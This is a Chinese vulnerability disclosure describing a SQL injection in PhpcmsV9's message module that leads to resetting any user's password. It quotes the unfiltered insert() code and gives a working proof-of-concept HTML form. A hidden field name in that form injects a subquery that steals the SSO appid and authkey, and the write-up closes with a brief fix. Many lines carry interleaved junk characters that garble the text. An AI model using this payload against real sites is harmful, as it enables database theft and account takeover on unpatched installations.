PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。

明天再更新下一个漏洞。
: `4 p- x" o0 ?3 z# p/ p9 |& O详细说明：
# R  I! k& K* W$ }- f1 t6 k在/phpcms9/phpcms/modules/message/index.php中有代码如下：
: g" x0 d) o1 T& Y4 X
% d$ L& B- o. y) B3 F9 S$messageid = $this->message_db->insert($_POST['info'],true);
+ u9 i! b: s, f3 ~7 o1 k8 }) t

insert方法是key value的，代码如下：
# l( ?0 ?) c& ^  Y
public function insert($data, $table, $return_insert_id = false, $replace = false) {
+ h6 ~' X  K2 _8 E                if(!is_array( $data ) || $table == '' || count($data) == 0) {
                        return false;
: r' D5 [) Q2 }  O' A                }
! v: `& Y; H, l) [; l+ T6 Z               
8 j6 U2 r# ?: N1 K' D9 V. F                $fielddata = array_keys($data);
* R) x; a- [0 \( m3 E5 w0 [8 a                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
# c1 Z. D: \8 M' ]                array_walk($valuedata, array($this, 'escape_string'));
3 s& h* w3 x% V$ m               
+ b. |( F* x2 l' R: Q+ a                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);
, z! k  Z% f/ P3 P' y
                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
: q! F! f; Y) r                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
9 s6 F. e& U: E" i2 o. ]$ @' }                $return = $this->execute($sql);
) S) [8 S" b8 V  v  `                return $return_insert_id ? $this->insert_id() : $return;
        }
, }' y( p' Y# x3 u
% j7 ^& s/ U  ]6 f! l% w
嗯，很遗憾的是

) F% d4 D. M& h# Q) C+ i  P4 tarray_walk($fielddata, array($this, 'add_special_char'));
& F: `* B2 Y8 w3 j
$ [! r9 s% i; G4 I
中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

  n3 m  ^, L! T: c漏洞证明：
1 R& `3 j! _# L4 Y/ T) I读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
6 i& v! g4 M( v  `+ t: {1 U
  `! I. H  c3 y. ?6 p: Y7 d1 N
表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
8 v; `; s. q+ i6 |/ X- `: e- q<table width="100%" cellspacing="0" class="table_form">
5 h/ @4 ?* d2 k' f8 E9 A<tr>
% i8 ^( N" F8 b' z0 Q1 V+ B9 o<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
<tr>
; y& a  H8 c8 D3 |1 D, Q& p<th>内 容：</th>
! @9 \7 m$ J6 x; z5 c) |; y<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
. ^9 Q. h, Y8 \1 n</tr>
<input type="hidden" name="info[replyid]" value="2" />
6 e2 C5 G8 p  Y$ w<input type="hidden" name="info[send_to_id]" value="cc" />
. b: @& Y# X, U- k* `- Z<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
+ ]5 S1 ~$ k) `, a! o7 M<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
<!-- 漏洞的利用重点在这里结束 -->
<tr>
<th>验证码：</th>
1 Y" A2 n7 A2 z" M5 i0 K<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
<tr>
<td></td>
<td colspan="2"><label>
<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
0 r5 r/ t. {4 c2 m! l</label></td>
! R; R2 ^) y1 W! Y% c3 j8 d6 {; b</tr>
# d  d8 [- @' [' K% c</table>
</form>
在add_special_char函数内对key做过滤就可以了。
7 d9 c( j7 R6 z5 T


8 R& T$ Y4 I" K- @. {2 W6 `: U* }3 ~